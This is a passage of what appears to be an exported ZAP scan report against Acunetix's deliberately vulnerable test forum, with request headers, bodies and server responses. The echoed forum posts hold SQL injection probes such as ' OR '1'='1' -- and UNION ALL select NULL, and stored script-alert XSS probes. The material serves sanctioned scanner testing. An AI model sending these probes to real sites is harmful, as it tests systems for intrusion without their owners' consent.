Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 505 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 13536 |
| Response Body - size: 13,536 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:44 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>o3lppoLN</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:05:24 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white)</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:06:11 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white')</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:51:58 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 <script>alert('Hello')</script> - 180.75.245.68</div><div class='posttext'>HELLO<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/13/2022 2:43:15 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>hi - 180.75.236.90</div><div class='posttext'>http://example.com/han.js<br />document.write("I'm coming");</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 4913 |
| Response Body - size: 4,913 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:27 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script><br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:08 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>111 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:31 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:41 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1<script>alert('Hello')</script> - 180.74.64.218</div><div class='posttext'>1232</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3065 |
| Response Body - size: 3,065 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" 